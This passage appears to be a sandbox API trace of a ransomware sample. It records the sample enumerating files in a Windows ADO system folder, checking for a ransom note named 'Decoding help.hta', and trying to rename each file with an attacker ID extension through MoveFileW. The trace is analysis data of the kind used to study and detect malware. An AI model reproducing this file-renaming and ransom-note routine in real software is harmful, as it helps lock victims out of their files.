nFileSizeLow=0xf9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0044.658] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.658] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado15.dll") returned -1 [0044.658] lstrlenW (lpString="msado15.dll") returned 11 [0044.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" [0044.658] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" [0044.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.748] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab15afe, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ab15afe, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ab15afe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0044.748] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.748] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.748] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.748] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado20.tlb") returned -1 [0044.748] lstrlenW (lpString="msado20.tlb") returned 11 [0044.748] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.748] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.748] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado20.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" [0044.748] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" [0044.748] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.749] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab15afe, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ab15afe, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ab15afe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0044.749] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.749] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.749] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado21.tlb") returned -1 [0044.749] lstrlenW (lpString="msado21.tlb") returned 11 [0044.749] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.749] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado21.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" [0044.749] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" [0044.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.749] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab3bc5e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ab3bc5e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ab3bc5e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0044.749] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.749] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.749] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.749] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado25.tlb") returned -1 [0044.749] lstrlenW (lpString="msado25.tlb") returned 11 [0044.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.750] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado25.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" [0044.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" [0044.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado25.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado25.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.750] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab3bc5e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ab3bc5e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ab3bc5e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0044.750] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.750] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.750] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado26.tlb") returned -1 [0044.750] lstrlenW (lpString="msado26.tlb") returned 11 [0044.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.750] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado26.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" [0044.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" [0044.750] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado26.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado26.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.794] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab87f1f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ab87f1f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ab87f1f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0044.794] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.794] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.794] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.795] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado27.tlb") returned -1 [0044.795] lstrlenW (lpString="msado27.tlb") returned 11 [0044.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.795] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado27.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" [0044.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" [0044.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado27.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado27.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.795] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8abd41df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8abd41df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8abd41df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0044.795] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.795] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.795] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado28.tlb") returned -1 [0044.795] lstrlenW (lpString="msado28.tlb") returned 11 [0044.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.795] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msado28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" [0044.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" [0044.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0044.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.796] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1c95fd30 | out: lpFindFileData=0x1c95fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dae14ed, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9dae14ed, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9dae14ed, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x56000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0044.796] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.796] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" [0044.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0044.796] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadomd.dll") returned -1 [0044.796] lstrlenW (lpString="msadomd.dll") returned 11 [0044.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*" [0044.796] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\*.*") returned 54 [0044.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\", lpString2="msadomd.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" [0044.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" [0044.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.796] FindNextFileW (in: 